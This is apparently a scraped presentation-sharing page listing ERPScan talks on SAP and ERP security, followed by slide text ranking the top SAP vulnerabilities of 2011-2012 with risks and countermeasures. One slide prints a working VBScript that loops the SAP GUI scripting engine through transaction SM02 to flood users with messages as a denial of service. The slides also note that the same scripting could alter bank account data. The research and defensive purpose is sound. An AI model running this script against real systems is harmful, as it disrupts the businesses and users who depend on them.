The presentation provides the list of top 10 SAP vulnerabilities (2011-2012) as well as ways of defense.
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The latest changes to SAP cybersecurity landscapeERPScan
SAP is the most popular business application with more than 250000 customers worldwide.
The presentation describes latest trends in SAP Security. There are multiple vulnerabilities found in SAP NetWeaver ABAP, SAP NetWeaver J2EE, SAP BusinessObjects, SAP HANA, and SAP Mobile Platform.
If I want a perfect cyberweapon, I'll target ERPERPScan
ERP Systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials
Nuclear, Retail, Telecommunication and other industries. All mission-critical data are stored in ERP Systems, so attacks against them may result in Espionage, Sabotage and Fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP Security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
Practical SAP pentesting (B-Sides San Paulo)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
5 real ways to destroy business by breaking SAP applicationsERPScan
SAP is the most popular business application with more than 263000 customers worldwide.
SAP risks can be divided into three groups: Espionage, Sabotage and Fraud.
The presentation provides a review of 5 most dangerous risks any business may face with. For every risk, there is its type, attack scenario, affected sector, and vulnerable module.
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
The latest changes to SAP cybersecurity landscapeERPScan
SAP is the most popular business application with more than 250000 customers worldwide.
The presentation describes latest trends in SAP Security. There are multiple vulnerabilities found in SAP NetWeaver ABAP, SAP NetWeaver J2EE, SAP BusinessObjects, SAP HANA, and SAP Mobile Platform.
If I want a perfect cyberweapon, I'll target ERPERPScan
ERP Systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials
Nuclear, Retail, Telecommunication and other industries. All mission-critical data are stored in ERP Systems, so attacks against them may result in Espionage, Sabotage and Fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP Security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
Practical SAP pentesting (B-Sides San Paulo)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
5 real ways to destroy business by breaking SAP applicationsERPScan
SAP is the most popular business application with more than 263000 customers worldwide.
SAP risks can be divided into three groups: Espionage, Sabotage and Fraud.
The presentation provides a review of 5 most dangerous risks any business may face with. For every risk, there is its type, attack scenario, affected sector, and vulnerable module.
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Practical SAP pentesting workshop (NullCon Goa)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
The increasing number of talks about SAP Security and SAP Security notes indicates that it becomes a hot topic nowadays.
The presentation describes top types of SAP vulnerabilities, the number of SAP systems available on the Internet and different risks business may face.
We did not manage to find any solution that could resolve all of these security problems described there, so we created one ourselves.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
SAP is the most popular business application with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
The presentation provides examples of simple and advanced attacks along with ways to avoid them.
SAP Mobile infrastructure consists of multiple systems such as SAP Mobile Platform (formerly Sybase Unwired Platform) also SAP Afaria MDM solution, Sybase SQL Anywhere Database, and hundreds of SAP's mobile applications. They even have their own store for mobile apps that can be developed by third parties. This talk highlights how one can hack SAP Mobile.
In this popular platform, we have discovered a lot of typical vulnerabilities - XSS, XXE, hardcoded static encryption keys, and vulnerabilities that are specific to this platform - logic vulnerabilities and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to compromised mobile phones.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Forgotten world - Corporate Business Application SystemsERPScan
Enterprise Resource Planning (ERP) is the collection of computers, servers and databases that store & manage:
- Human Resources information
- Inventory
- Shipping
- Procurement
- Financial, Banking & Accounting
- Payroll.
Basically, it's data the company really cares about.
ERP seemed to be a forgotten world in information security field. However, any vulnerability or compromise of these systems can cause a significant monetary loss or even stoppage of business. Although a relatively new area, during the last year there has been more awareness of security problems in ERP.
This presentation covers such parts of ERP Security as ERP Security issues, Architecture Flaws, Vulnerabilities and others.
There is a myth that SAP is not accessible and cannot be attacked from the Internet. The system becomes more and more popular, cloud services and mobile solutions appear, so more and more SAP services become accessible from the Internet.
Why are vulnerabilities which allow to read any file from SAP OS important? Because SAP stores a lot of sensitive information in files. It can be log files, traces files, some configurations or properties files. Of course, most of them have protection like encryption, but the presentation shows how you can easily bypass this encryption.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
Obtained findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
Any information an attacker might want is stored in corporate ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system, and they can cause significant reputation and financial losses to the business.
This research provides information about SSRF attacks and their classification. It also shows examples of SSRF attacks, as well as new potential and real SSRF vectors.
Many SAP systems are connected to the Internet, and exposing sensitive services beyond Web applications. Furthermore, the internal network is usually not properly segmented.
Practical pentesting of ERPs and business applicationsERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.
The presentation describes the specificity of ERP pentesting and focuses on SAP NetWeaver JAVA and Oracle PeopleSoft pentesting.
Practical SAP pentesting workshop (NullCon Goa)ERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor with more than 250000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
The increasing number of talks about SAP Security and SAP Security notes indicates that it becomes a hot topic nowadays.
The presentation describes top types of SAP vulnerabilities, the number of SAP systems available on the Internet and different risks business may face.
We did not manage to find any solution that could resolve all of these security problems described there, so we created one ourselves.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
SAP is the most popular business application with more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
The presentation provides examples of simple and advanced attacks along with ways to avoid them.
SAP Mobile infrastructure consists of multiple systems such as SAP Mobile Platform (formerly Sybase Unwired Platform) also SAP Afaria MDM solution, Sybase SQL Anywhere Database, and hundreds of SAP's mobile applications. They even have their own store for mobile apps that can be developed by third parties. This talk highlights how one can hack SAP Mobile.
In this popular platform, we have discovered a lot of typical vulnerabilities - XSS, XXE, hardcoded static encryption keys, and vulnerabilities that are specific to this platform - logic vulnerabilities and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to compromised mobile phones.
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
The presentation describes 5 steps you should take to secure your SAP. There are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
Forgotten world - Corporate Business Application SystemsERPScan
Enterprise Resource Planning (ERP) is the collection of computers, servers and databases that store & manage:
- Human Resources information
- Inventory
- Shipping
- Procurement
- Financial, Banking & Accounting
- Payroll.
Basically, it's data the company really cares about.
ERP seemed to be a forgotten world in information security field. However, any vulnerability or compromise of these systems can cause a significant monetary loss or even stoppage of business. Although a relatively new area, during the last year there has been more awareness of security problems in ERP.
This presentation covers such parts of ERP Security as ERP Security issues, Architecture Flaws, Vulnerabilities and others.
There is a myth that SAP is not accessible and cannot be attacked from the Internet. The system becomes more and more popular, cloud services and mobile solutions appear, so more and more SAP services become accessible from the Internet.
Why are vulnerabilities which allow to read any file from SAP OS important? Because SAP stores a lot of sensitive information in files. It can be log files, traces files, some configurations or properties files. Of course, most of them have protection like encryption, but the presentation shows how you can easily bypass this encryption.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
Obtained findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
Any information an attacker might want is stored in corporate ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system, and they can cause significant reputation and financial losses to the business.
This research provides information about SSRF attacks and their classification. It also shows examples of SSRF attacks, as well as new potential and real SSRF vectors.
Many SAP systems are connected to the Internet, and exposing sensitive services beyond Web applications. Furthermore, the internal network is usually not properly segmented.
Practical pentesting of ERPs and business applicationsERPScan
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.
The presentation describes the specificity of ERP pentesting and focuses on SAP NetWeaver JAVA and Oracle PeopleSoft pentesting.
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
An increasing number of SAP Security Notes and talks on SAP Security proves that it becomes a really hot topic nowadays. However, SAP systems attacks are still believed to be available only for insiders. The reality is not so good. There are about 5000 systems including dispatchers, message servers, SapHostcontrols, Web-services on the internet.
Top 10 vulnerabilities 2011-2012 are:
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
The presentation provides a detailed description of these attacks, its potential business risks and the way to prevent them.
EAS-SEC: Framework for securing business applicationsERPScan
For a quite long time, ERP Security was only the synonym of segregation of duties. But nowadays this situation has changed. There are 3 areas of Business Application Security such as SOD, Custom Code security and Application platform security. SAP customers are now aware of problems with SAP installations, but they still don’t know, where should they start to solve them.
The aim of EAS-SEC (http://eas-sec.org/) is to aware people about enterprise application security problems and create guidelines and tools for enterprise application security assessment.
Architecture vulnerabilities in SAP platformsERPScan
SAP security becomes a hot theme nowadays. Attacks on SAP can put a business at risk of Espionage, Sabotage and Fraud.
The presentation covers the following architecture and unusual issues:
Authentication Bypass
1. Verb tampering
2. Invoker servlet
Encryption
3. Storage – SAPGUI
4. Authentication – P4
5. Transfer – RFC, Diag
SSRF
6. Port Scan
7. Command execution
8. Security bypass
Also, the presentation gives advice for developers and describes future trends in SAP Security area.
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usPROIDEA
Nowadays, everyone knows about the great importance of SAP systems and the critical data processed by them. Large companies install SAP Security Notes regularly so as not to repeat the mistake of Nvidia. One bug is not enough anymore to get access to all corporate SAP systems. Pentesters frequently find themselves in a situation where the OS of an SAP server has been compromised successfully, but they have not got an access to the ERP system. In addition, it is rather common to have an unprivileged account, which give them access to the encrypted password, but not to the whole system. Sometimes they even try to break into other systems with help of the passwords, which users usually use in the systems they’ve already broken, but they can’t, because they need them to be decrypted first. Where do we find the treasured password to access the financial transactions and revenues of NASDAQ monsters?
Where and how does SAP store user passwords? Are all passwords stored as hashes, or can attackers find passwords in plaintext?
This talk reviews the many places where SAP stores critical credentials, such as usernames and passwords, and, which is more interesting, the way it stores them. Methods of retrieving them will be described, and decryption utilities will be presented.
SAP GUI shortcuts, RFC connections, SAP Security Storage, logs, traces, Database links, SAP HANA Storage, you name it – all varieties of SAP modules will be discussed in this talk.
A crushing blow at the heart of SAP’s J2EE Engine. ERPScan
Automation of business processes like ERP, PLM, CRM, SRM based on ABAP.
There are the following integration, collaboration and management based on J2EE engine:
- SAP Portal
- SAP PI
- SAP XI
- SAP Mobile Infrastructure
- SAP Solution Manager.
Administrators, developers, pentesters, and researchers mostly focus on ABAP stack. Hackers know about it, so they will find easier ways to control your business.
The presentation describes SAP J2EE Platform Architecture and provides examples of internal and external attacks and ways of its prevention.
Top Ten Proactive Web Security Controls v5Jim Manico
It is not easy to build a secure, low-risk or risk-managed web application. Firewalls, “policy” and other traditional information security measures serve as either an incomplete or useless measure in the pursuit of web application security.
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game.
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.
This document is neither scientific nor complete. In fact it is a bit misguided. There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsOlivier DASINI
MySQL Enterprise Transparent Data Encryption (TDE) protects your critical data by enabling data-at-rest encryption in the database. It protects the privacy of your information, prevents data breaches and helps meet regulatory requirements including the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and numerous others.
MySQL Enterprise Audit provides an easy to use, policy-based auditing solution that helps organizations implement stronger security controls and satisfy regulatory compliance.
As more sensitive data is collected, stored and used online, database auditing becomes an essential component of any security strategy. To guard against the misuse of information, popular compliance regulations including HIPAA, Sarbanes-Oxley, and the PCI Data Security Standard require organizations to track access to information.
MySQL Enterprise Firewall guards against cyber security threats by providing real-time protection against database specific attacks. Any application that has user-supplied input, such as login and personal information fields is at risk. Database attacks don't just come from applications. Data breaches can come from many sources including SQL virus attacks or from employee misuse. Successful attacks can quickly steal millions of customer records containing personal information, credit card, financial, healthcare or other valuable data.
MySQL Enterprise Masking and De-identification provides an easy to use, built-in database solution to help organizations protect sensitive data from unauthorized uses by hiding and replacing real values with substitutes.
MySQL Enterprise Edition provides ready to use external authentication modules to easily integrate existing security infrastructures, including Linux Pluggable Authentication Modules (PAM) and Windows Active Directory.
Business applications like ERP, CRM, SRM, and others are one of the major topic of information security as these applications store business-critical data and any vulnerability in them can cause a significant monetary and reputational loss or even stoppage of business.
There are several myths about Business Applications Security such as:
Myth 1: Business Applications are available only internally.
Myth 2: ERP security is a vendors' problem.
Myth 3: Business Application internals are very specific and unknown to hackers.
Myth 4 ERP security is all about Segregation Of Duties.
Our findings explode these myths.
An unusual number of recent news articles spotlighting SSL security flaws including HeartBleed, POODLE, and FREAK, has forced major security policy changes in communication software and compliance standards. In order to meet the future security challenges, and to continue providing business, this session will highlight how Rocket MV product family can help you to fortify your data communications, and meet compliance requirements of today and tomorrow.
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
This research includes detailed attack timeline, discovers what kind of vulnerability was exploited and provides the recommendations how to avoid data breaches in SAP systems.
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
Oracle is the second largest vendor on the ERP market, and its PeopleSoft is used in more than 7000 companies including about 50 % of Fortune 100. PeopleSoft applications are widespread over the world with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes PeopleSoft Architecture and provides several internal and external attack vectors. Let’s look at the most dangerous one. PeopleSoft systems are often accessible from the Internet. And some parts of the system have to be available before registration, for example, job application forms or “Forgot your password?” forms. For this purpose, there is a special user with minimal rights in PeopleSoft systems. When you enter, the system automatically authenticates you as this user. It is an opportunity to perform a privilege escalation attack by bruteforcing the authentication cookie called TokenID. TokenID is generated based on SHA1 hashing algorithm, and according to the latest information, 8-characters alpha-numeric password can be decrypted within one day on latest GPUs that cost about $ 500.
13 real ways to destroy business by breaking company’s SAP applicationsERPScan
All SAP risks can be divided into three groups: Espionage, Sabotage and Fraud.
The presentation provides a review of 13 most dangerous risks any business may face with. For every risk, there is its type, attack scenario, affected sector, and vulnerable module.
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
SAP is the most popular business application with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. However, in ERP systems, all business processes are performed, all critical information is stored like finances, HR, clients. Not to care about the security of this data is not very sensible.
SAP NetWeaver Development Infrastructure is a complex item. It combines the characteristics and advantages of local development environments with a server-based development landscape. All this stuff centrally provides opportunities to support the software, implement new features, manage lifecycle of a product, etc. So, the main aim is to control deployment of components in the system landscape in a standardized manner.
The key component in DI scheme is Software Deployment Manager (SDM). It is directly related to the production systems, that is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines, and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security
There are most important takeaways for CISOs to provide SAP Security for Enterprises. The presentation destroys the SAP Security myths, includes statistics obtained by ERPScan Research Group, and future trends in SAP Security.
Online analytical processing (OLAP) is an approach to formulate and answer multidimensional queries to large datasets. OLAP and Business Intelligence were initially developed to help top and middle-level executives to analyze the information about processes and data inside and outside the company. OLAP is all about BI and Big Data.
The main players of OLAP industry are Microsoft with Microsoft Analysis Services, SAP with SAP NetWeaver BW, SAS OLAP Server, IBM Cognos T1, open source icCube solution, Essbase and OLAP addon from Oracle and others.
MDX is a very popular language. At this moment, we don’t have an alternative language for multidimensional data requests. All developers forget about MDX security. However, security issues in MDX may cause a lot of attacks: data stealing, file reading, privilege escalation, remote code execution, SQL injection, cross-site scripting, etc.
The presentation covers topics such as details of OLAP technology, MDX attacks, Getting RCE with MDX, and mdXML attacks.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
1. Invest
in
security
to
secure
investments
SAP
(In)Security:
New
and
Best
Alexander
Polyakov.
CTO
at
ERPScan
1
2. About
ERPScan
• The
only
360-‐degree
SAP
Security
soluHon
-‐
ERPScan
Security
Monitoring
Suite
for
SAP
• Leader
by
the
number
of
acknowledgements
from
SAP
(
150+
)
• 60+
presenta>ons
key
security
conferences
worldwide
• 25
Awards
and
nomina>ons
• Research
team
-‐
20
experts
with
experience
in
different
areas
of
security
• Headquarters
in
Palo
Alto
(US)
and
Amsterdam
(EU)
2
4. Really
• The
most
popular
business
applicaHon
• More
than
120000
customers
• 74%
of
Forbes
500
4
5. Agenda
• Intro
• SAP
security
history
• SAP
on
the
Internet
• Most
popular
SAP
issues
(OLD)
• Top
10
latest
interesHng
a[acks
(NEW)
• DEMOs
• Conclusion
5
6. 6
3
areas
of
SAP
Security
2010
Applica3on
pla4orm
security
Prevents
unauthorized
access
both
insiders
and
remote
a3ackers
SoluHon:
Vulnerability
Assessment
and
Monitoring
2008
ABAP
Code
security
Prevents
a3acks
or
mistakes
made
by
developers
SoluHon:
Code
audit
2002
Business
logic
security
(SOD)
Prevents
a3acks
or
mistakes
made
SoluHon:
GRC
7. 0
5
10
15
20
25
30
35
2006
2007
2008
2009
2010
2011
2012
Most
popular:
• BlackHat
• HITB
• Troopers
• RSA
• Source
• DeepSec
• etc.
Talks
about
SAP
security
7
8. 0
100
200
300
400
500
600
700
800
900
2001
2002
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
By
April
26,
2012,
a
total
of
2026
notes
SAP
Security
notes
8
9. 0
50
100
150
200
250
300
350
12
-‐SQL
Inj
11
-‐
BOF
10
-‐
Denial
of
service
9
-‐
Remote
Code
ExecuHon
8
-‐
Verb
tampering
7
-‐
Code
injecHon
vulnerability
6
-‐
Hard-‐coded
credenHals
5
-‐
Unauthorized
usage
of
applicaHon
4
-‐
InformaHon
Disclosure
3
-‐
Missing
Auth
check
2
-‐
XSS/Unauthorised
modificaHon
of
1
-‐
Directory
Traversal
Stats
from
:
• 1Q
2012
• 1Q
2010
• 4Q
2009
SAP
vulnerabili>es
by
type
9
10. Top
problems
by
OWASP-‐EAS
(Implementa>on
issues)
• EASAI-‐1
Lack
of
patch
management
• EASAI-‐2
Default
Passwords
for
applicaHon
access
• EASAI-‐3
SOD
conflicts
• EASAI-‐4
Unnecessary
Enabled
ApplicaHon
features
• EASAI-‐5
Open
Remote
management
interfaces
• EASAI-‐6
lack
of
password
lockout/complexity
checks
• EASAI-‐7
Insecure
opHons
• EASAI-‐8
Unencrypted
communicaHons
• EASAI-‐9
Insecure
trust
relaHons
• EASAI-‐10
Guest
access
10
11. Top
problems
by
BIZEC
• BIZEC
TEC-‐01:
Vulnerable
Sojware
in
Use
• BIZEC
TEC-‐02:
Standard
Users
with
Default
Passwords
• BIZEC
TEC-‐03:
Unsecured
SAP
Gateway
• BIZEC
TEC-‐04:
Unsecured
SAP/Oracle
authenHcaHon
• BIZEC
TEC-‐05:
Insecure
RFC
interfaces
• BIZEC
TEC-‐06:
Insufficient
Security
Audit
Logging
• BIZEC
TEC-‐07:
Unsecured
SAP
Message
Server
• BIZEC
TEC-‐08:
Dangerous
SAP
Web
ApplicaHons
• BIZEC
TEC-‐09:
Unprotected
Access
to
AdministraHon
Services
• BIZEC
TEC-‐10:
Insecure
Network
Environment
• BIZEC
TEC-‐11:
Unencrypted
CommunicaHons
11
12. Business
Risks
Espionage
• Stealing
financial
informaHon
• Stealing
corporate
secrets
• Stealing
suppliers
and
customers
list
• Stealing
HR
data
Sabotage
• Denial
of
service
• ModificaHon
of
financial
reports
• Access
to
technology
network
(SCADA)
by
trust
relaHons
Fraud
• False
transacHons
• ModificaHon
of
master
data
• e.t.c.
12
13. SAP
on
the
Internet
MYTH:
SAP
systems
a^acks
available
only
for
insiders
• We
have
collected
data
about
SAP
systems
in
the
WEB
• Have
various
stats
by
countries,
applicaHons,
versions
• InformaHon
from
Google,
Shodan,
Nmap
scan
13
15. About
5000
systems
including
Dispatcher,
Message
server,
SapHostcontrol,
Web-‐
services
SAP
on
the
Internet
15
16. Top
10
vulnerabili>es
2011-‐2012
1. AuthenHcaHon
Bypass
via
Verb
tampering
2.
AuthenHcaHon
Bypass
via
the
Invoker
servlet
3.
Buffer
overflow
in
ABAP
Kernel
4.
Code
execuHon
via
TH_GREP
5.
MMC
read
SESSIONID
6.
Remote
portscan
7.
EncrypHon
in
SAPGUI
8.
BAPI
XSS/SMBRELAY
9.
XML
Blowup
DOS
10.
GUI
ScripHng
DOS
16
17. 10
–
GUI-‐Scrip>ng
DOS:
Descrip>on
• SAP
users
can
run
scripts
which
automate
their
user
funcHons
• A
script
has
the
same
rights
in
SAP
as
the
user
who
launched
it
• Security
message
which
is
shown
to
user
can
be
turned
off
in
the
registry
• Almost
any
user
can
use
SAP
Messages
(SM02
transacHon)
• It
is
possible
to
run
DOS
a[ack
on
any
user
using
a
simple
script
New
Author: Dmitry Chastukhin (ERPScan)
17
18. 10
–
GUI-‐scrip>ng:
Details
If Not IsObject(application) Then
Set SapGuiAuto = GetObject("SAPGUI")
Set application = SapGuiAuto.GetScriptingEngine
End If
If Not IsObject(connection) Then
Set connection = application.Children(0)
End If
If Not IsObject(session) Then
Set session = connection.Children(0)
End If
If IsObject(WScript) Then
WScript.ConnectObject session, "on"
WScript.ConnectObject application, "on"
End If
do
a=a+1
session.findById("wnd[0]").maximize
session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
session.findById("wnd[0]/tbar[0]/btn[0]").press
session.findById("wnd[0]/tbar[1]/btn[34]").press
session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
session.findById("wnd[1]").sendVKey 4
session.findById("wnd[2]/usr/lbl[1,3]").setFocus
session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
session.findById("wnd[2]").sendVKey 2
session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
session.findById("wnd[1]/tbar[0]/btn[0]").press
Loop Until a>=1000
18
19. 10
–
GUI-‐scrip>ng:
Other
a^acks
Other
a^acks
like
changing
banking
accounts
in
LFBK
also
possible
Script
can
be
uploaded
using:
• SAPGUI
AcHveX
vulnerability
• Teensy
USB
flash
• Any
other
method
of
client
exploitaHon
19
20. 10
–
GUI-‐scrip>ng:
Business
risks
Ease
of
exploita>on
–
Medium
Sabotage
–
High
Espionage
–
No
Fraud
–
No
20
22. 9
–
XML
Blowup
DOS:
Descrip>on
• WEBRFC
interface
can
be
used
to
run
RFC
funcHons
• By
default
any
user
can
have
access
• Can
execute
at
least
RFC_PING
• SAP
NetWeaver
is
vulnerable
to
malformed
XML
packets
• It
is
possible
to
run
DOS
a[ack
on
server
using
simple
script
• It
is
possible
to
run
over
the
Internet!
New
Author: Alexey Tyurin (ERPScan)
22
24. 9
–
XML
Blowup
DOS:
Business
risks
Ease
of
exploita>on
–
Medium
Espionage
–
No
Fraud
–
No
Sabotage
–
Cri>cal
24
25. 9
–
XML
Blowup
DOS:
Preven>on
•
Disable
WEBRFC
•
Prevent
unauthorized
access
to
WEBRFC
using
S_ICF
•
Install
SAP
notes
